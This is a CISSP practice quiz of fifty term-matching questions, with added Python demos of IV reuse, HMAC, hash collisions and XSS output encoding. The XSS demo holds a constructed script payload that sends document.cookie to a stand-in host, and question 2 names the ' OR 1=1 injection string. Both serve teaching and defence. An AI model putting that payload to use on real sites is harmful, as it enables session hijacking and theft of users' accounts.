Test your basic knowledge: CISSP Certified Information Systems Security Professional
Subjects: certifications, it-skills, cissp
Instructions:
Answer 50 questions in 15 minutes.
If you are not ready to take this test, you can study first.
Match each statement with the correct term.
Don't refresh. All questions and answers are randomly picked and ordered every time you load a test.
This is a study tool. The 3 wrong answers for each question are randomly chosen from answers to other questions, so at times the correct answer will look obvious, but retaking the test reinforces your understanding.
1. A programming design concept which abstracts one set of functions from another in a serialized fashion
Alternate Data Streams (File System Forks)
Notification
Layering
TCSEC (Orange Book)
2. A type of malformed input that appends an always-true conditional (e.g. ' OR 1=1) to a query, adding a request for data that is against the security policy
Authorization
Privacy Laws
Substitution
SQL Injection
3. Shifting the alphabet intact a fixed number of positions
Remote Access Trojan
Shift Cipher (Caesar)
Primary Storage
Exercise
4. Those actions and backup processes determined by an organization to be necessary to meet its data recovery and restoration objectives, including timeframes, technologies and offsite storage, and that will ensure time objectives can be met.
Cryptology
Data Backup Strategies
Deadlock
Full-Interruption test
5. An access policy determined by the owner of a file (or other resource). The owner decides who is allowed access to the file and what privileges they have; most commonly used in the PC environment (e.g. file permissions).
Site Policy
Preemptive
Job Rotation
Discretionary Access Control (DAC)
6. Information residing on computer systems that is readily visible to the operating system with which it was created and is immediately accessible to users without undeletion, modification or reconstruction.
Multi-Processing
Mock Disaster
Active Data
Mixed Law System
7. Mitigation of system or component loss or interruption through use of backup capability.
Fiber Optics
Fault Tolerance
Modems
Bollard
8. An access policy that uses a security label system. Users have clearances, and resources have security labels that contain data classifications. MAC compares these two attributes to determine access control capabilities; most commonly used in government.
Mandatory Access Control (MAC)
Mock Disaster
Modification
Exercise
9. A form of data hiding that prevents running processes from reading or writing each other's memory
Basics Of Secure Design
Mandatory Vacations
TEMPEST
Process Isolation
10. A formal announcement by pre-authorized personnel that a disaster or severe outage is predicted or has occurred and that triggers pre-arranged mitigating actions (e.g. A move to an alternate site.)
Cipher Text
Business Interruption Insurance
Framework
Declaration
11. Randomly generated (and never reused) value used by many cryptosystems so that encrypting the same plaintext twice yields a different ciphertext
Initialization Vector
Bridge
Exercise
Distributed Processing
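Why question 11 insists on a unique ciphertext, as an added example that is not from the quiz. It uses a toy CTR-style keystream derived from SHA-256 so that it runs with the Python standard library only; it is an illustration of IV handling, not a cipher to deploy (use a vetted AEAD such as AES-GCM). A fixed IV makes equal plaintexts produce equal ciphertexts and leaks the XOR of two different plaintexts; a fresh random IV does neither. Key, IV and messages are constructed.

```python
import hashlib
import os


def keystream(key: bytes, iv: bytes, length: int) -> bytes:
    """Toy CTR-style keystream: SHA-256(key || iv || counter) blocks, truncated to 'length'.
    Constructed for illustration only."""
    blocks = []
    counter = 0
    while sum(len(b) for b in blocks) < length:
        blocks.append(hashlib.sha256(key + iv + counter.to_bytes(4, "big")).digest())
        counter += 1
    return b"".join(blocks)[:length]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Stream encryption: plaintext XOR keystream. Decryption is the same call."""
    return xor_bytes(plaintext, keystream(key, iv, len(plaintext)))


def reuse_leak(key: bytes, iv: bytes, p1: bytes, p2: bytes) -> bytes:
    """With one IV reused for two messages, XOR of the ciphertexts equals XOR of the
    plaintexts: the keystream cancels out and the key is never needed."""
    return xor_bytes(encrypt(key, iv, p1), encrypt(key, iv, p2))


def demo():
    """Returns (equal ciphertexts under a fixed IV?, equal ciphertexts under random IVs?)."""
    key = b"constructed-sample-key"          # constructed
    msg = b"transfer 100 to bob"             # constructed
    fixed_iv = bytes(16)
    c1 = encrypt(key, fixed_iv, msg)
    c2 = encrypt(key, fixed_iv, msg)
    c3 = encrypt(key, os.urandom(16), msg)
    c4 = encrypt(key, os.urandom(16), msg)
    return c1 == c2, c3 == c4


if __name__ == "__main__":
    print("fixed IV repeats ciphertext:", demo()[0], "| random IVs repeat:", demo()[1])
    p1, p2 = b"attack at dawn!!", b"retreat at dusk!"
    print("leak == p1 XOR p2:", reuse_leak(b"k", bytes(16), p1, p2) == xor_bytes(p1, p2))
```

The first result shows that an observer who sees identical ciphertexts learns that identical messages were sent; the second shows the classic two-time-pad failure, where a reused IV lets an attacker recover the XOR of the plaintexts without the key.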
12. Actions measured against either a policy or what a reasonable person would do
Data Marts
Top Secret
Due Diligence
Enticement
13. Maximum tolerable time for a business function to be unavailable; the basis of the recovery strategy
Standard
Contact List
Object Reuse
Recovery Time Objectives
14. Malware that attaches itself to a host program and requires user interaction to execute (unlike a worm, it does not spread on its own)
Virus
Virtual Memory
Message Digest
Accreditation
15. Secondhand evidence, usually not admissible in court
Mitigate
Hearsay Evidence
Control
File Extension
16. A test of a system conducted without prior knowledge on the part of either the tester or the tested organization
Kernel
Change Control
Double Blind Testing
Hard Disk
17. A cable consisting of a core inner conductor surrounded by an insulator and an outer cylindrical conductor
Centralized Access Control Technologies
Malformed Input
Virtual Memory
Coaxial Cable
18. Provides a physical cross connect point for devices.
Blind Testing
Voice Over IP (VOIP)
Disaster Recovery Tape
Patch Panels
19. The hardware and software mediator of all subject and object interactions which has as its primary goal security policy enforcement.
Virtual Memory
Reference Monitor
Transients
Picking
20. Process of statistically testing a data set for the likelihood of relevant information.
Repeaters
Domain
Sampling
Discretionary
21. A distributed system's transaction control that requires all participants' updates either to complete together or to roll back
Honeypot
Alternate Site
Proprietary
2-Phase Commit
22. Two certificate authorities that trust each other
Control Category
Databases
Transients
Cross Certification
23. To assert or claim an identity to an authentication system
Identification
Algorithm
Non-Discretionary Access Control
Redundant Array Of Independent Drives (RAID)
24. The technical and risk assessment of a system within the context of its operating environment
Certification
File Level Deletion
Log
Control Type
25. A message authentication code computed by hashing the message together with a secret symmetric key, so that only a holder of the key can produce or verify it
Due Care
Keyed-Hashing For Message Authentication
Administrative
Multi-Core
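Question 25 in code, added here and not part of the quiz: HMAC-SHA256 from Python's standard library beside a plain unkeyed hash, each checked by a receiver. Anyone can recompute an unkeyed digest over a forged message, so it proves nothing about who sent it; the keyed digest cannot be recomputed without the shared secret. The secret and messages are constructed.

```python
import hashlib
import hmac


def unkeyed_digest(message: bytes) -> str:
    """Plain SHA-256: integrity against accidental corruption only."""
    return hashlib.sha256(message).hexdigest()


def keyed_digest(key: bytes, message: bytes) -> str:
    """HMAC-SHA256: the secret key is mixed into the hash computation itself."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def receiver_unkeyed(message: bytes, tag: str) -> bool:
    """Receiver that trusts a plain hash shipped alongside the message."""
    return unkeyed_digest(message) == tag


def receiver_keyed(key: bytes, message: bytes, tag: str) -> bool:
    """Receiver that checks an HMAC; compare_digest avoids timing leaks on the tag."""
    return hmac.compare_digest(keyed_digest(key, message), tag)


def forgery_demo():
    """An attacker who knows the algorithm but not the key replaces the message
    and attaches a tag. Returns (unkeyed receiver accepts?, keyed receiver accepts?)."""
    key = b"constructed-shared-secret"       # constructed; known only to sender/receiver
    forged = b"amount=9999&to=mallory"       # constructed
    accepted_unkeyed = receiver_unkeyed(forged, unkeyed_digest(forged))
    accepted_keyed = receiver_keyed(key, forged, keyed_digest(b"attacker-guess", forged))
    return accepted_unkeyed, accepted_keyed


if __name__ == "__main__":
    key = b"constructed-shared-secret"
    msg = b"amount=100&to=bob"
    tag = keyed_digest(key, msg)
    print("legitimate message verifies:", receiver_keyed(key, msg, tag))
    print("forgery accepted (unkeyed, keyed):", forgery_demo())
```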
26. Real-time, automatic and transparent backup of data.
False Negative
Remote Journaling
Identification
Sampling
27. Systems whose incapacity or destruction would have a debilitating impact on the economic security of an organization, community, nation, etc.
Inheritance
Access Control Attacks
Critical Infrastructure
Multiplexers
28. The study of cryptography and cryptanalysis
Cryptology
Access Control
Initialization Vector
Classification Scheme
29. The duplication of data on separate disks in real time to ensure its continuous availability, currency and accuracy. True mirroring enables a zero recovery point objective.
Disk Mirroring
Algorithm
Compression
Site Policy Awareness
30. Recovery alternative which outsources a business function at a cost
Service Bureau
Non-Interference
Time Of Check/Time Of Use
Corrective
31. A test that answers the questions: Does the organization have the documentation and people it needs? Do they understand the documentation?
Surge
Desk Check Test
Critical Records
Need-To-Know
32. Third party processes used to organize the implementation of an architecture
Framework
Architecture
Packet Filtering
Process Isolation
33. Uses a role-based method to determine access rights and permissions; role-based access control grants access according to the user's role and responsibilities within the company.
Guidelines
Service Bureau
Kerberos
Non-Discretionary Access Control
34. Layer 1 network device used to connect network segments together but providing no traffic control (a concentrator).
Hub
Access Control Attacks
Degauss
Databases
35. Motive, opportunity and means; when looking for suspects it is important to consider these three things
MOM
Structured Walk-Through Test
Mock Disaster
Surveillance
36. A trusted issuer of digital certificates
Certification Authority
Administrative
Multi-Party Control
Business Continuity Program
37. A choice in risk management: convincing another party to assume the risk, typically by payment (e.g. insurance)
Sag/Dip
Transfer
System Downtime
Control Category
38. Encryption system using a pair of mathematically related but unequal keys
Cookie
Service Bureau
Keystroke Logging
Asymmetric
39. Requires understanding both the assets that need to be protected and management's priorities; be prepared to adjust the design over time and to verify that it has been implemented correctly. The designer needs to be a good negotiator, artist and analyst.
Mixed Law System
Basics Of Secure Design
Picking
Simulation Test
40. A tag of three or four letters, preceded by a period, that identifies a data file's format or the application used to create it.
Ethics
Activation
File Extension
Certification Authority
41. An unintended communication path
Authorization
File
Framework
Covert Channel
42. Control category: to record an adversary's actions
Detective
Mitigate
Spyware
Reference Monitor
43. The process of recovering a database to the point of failure by applying active journal or log data to the current backup files of the database.
Forward Recovery
Rogue Access Points
Message Digest
Hearsay Evidence
44. Mitigate damage by isolating compromised systems from the network.
Switches
Security Kernel
Containment
Initialization Vector
45. Control category: an additional control applied to an asset to make up for the weakness or absence of a primary control
Moore's Law
Mandatory Vacations
Compensating
Criminal Law
46. Location where coordination and execution of BCP or DRP is directed
Separation Of Duties
Examples of technical security components
Emergency Operations Center (EOC)
Investigation
47. The statistical probability of a collision is higher than intuition suggests: with N possible hash values, about 1.18 * sqrt(N) random inputs give a 50% chance that two of them collide
Interpreter
Mitigate
Birthday Attack
Parallel Test
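The probability in question 47 made concrete, as an added example that is not from the quiz. SHA-256 truncated to 24 bits stands in for a short digest (N = 2^24 possible values), and distinct counter-style messages are hashed until two share a digest; the count of attempts lands near the 1.18 * sqrt(N) birthday estimate, thousands of times fewer than the ~N attempts a brute-force search for one specific digest would need. The message format is constructed.

```python
import hashlib
import math


def truncated_hash(data: bytes, bits: int) -> int:
    """First 'bits' bits of SHA-256 as an integer: a model of a weak, short digest."""
    digest = int.from_bytes(hashlib.sha256(data).digest(), "big")
    return digest >> (256 - bits)


def find_collision(bits: int):
    """Hash distinct messages "msg-0", "msg-1", ... until two share a truncated digest.
    Returns (message_a, message_b, number_of_hashes_computed). Inputs are deterministic,
    so the result is reproducible."""
    seen = {}
    n = 0
    while True:
        msg = b"msg-%d" % n                       # constructed message format
        h = truncated_hash(msg, bits)
        if h in seen:
            return seen[h], msg, n + 1
        seen[h] = msg
        n += 1


def expected_trials(bits: int) -> float:
    """Birthday bound: about 1.1774 * sqrt(N) random samples for a 50% collision chance."""
    return 1.1774 * math.sqrt(2 ** bits)


def preimage_trials(bits: int) -> int:
    """Expected work to hit one chosen digest by brute force: about N = 2**bits."""
    return 2 ** bits


if __name__ == "__main__":
    bits = 24
    a, b, trials = find_collision(bits)
    print("collision:", a, b, "after", trials, "hashes")
    print("birthday estimate: %.0f; preimage brute force: %d" % (expected_trials(bits), preimage_trials(bits)))
```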
48. A planned or unplanned interruption in system availability.
Logic Bomb
System Downtime
Conflict Of Interest
Business Unit Recovery
49. Object reuse protection and auditing
Qualitative
Elements of Negligence
Orange Book C2 Classification
Fault Tolerance
50. An attack that abuses a user's trust in a website by injecting attacker-controlled script into its pages; the script can redirect users to untrusted websites that capture data or install more malware
SQL Injection
Cross-Site Scripting
Technical Access Controls
Business Continuity Steering Committee
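Question 50's defence in code, added here and not part of the quiz: the same greeting rendered with untrusted input inserted raw and with HTML output encoding via Python's html.escape, so that the attacker's markup reaches the browser as inert text. The payload and the evil.example host are constructed.

```python
import html


def render_greeting_vulnerable(name: str) -> str:
    """Untrusted input interpolated straight into the page markup."""
    return "<p>Welcome back, " + name + "!</p>"


def render_greeting_safe(name: str) -> str:
    """Output encoding for HTML body context: <, >, &, " and ' become entities,
    so the browser shows the input as text instead of executing it."""
    return "<p>Welcome back, " + html.escape(name, quote=True) + "!</p>"


# Constructed payload: exfiltrates the session cookie to an attacker host.
PAYLOAD = '<script>location="https://evil.example/?c="+document.cookie</script>'


def contains_script_tag(page: str) -> bool:
    """True if the rendered page carries a live <script> element."""
    return "<script>" in page


def demo():
    """Returns (vulnerable page has live script?, encoded page has live script?)."""
    return (
        contains_script_tag(render_greeting_vulnerable(PAYLOAD)),
        contains_script_tag(render_greeting_safe(PAYLOAD)),
    )


if __name__ == "__main__":
    print(render_greeting_vulnerable(PAYLOAD))
    print(render_greeting_safe(PAYLOAD))
    print("live script (vulnerable, safe):", demo())
```

Encoding is context-specific: html.escape is right for text inside an HTML element, but input placed into a URL, a JavaScript string or an attribute name needs the encoding for that context, which is why frameworks with automatic contextual escaping are preferred over hand-written concatenation.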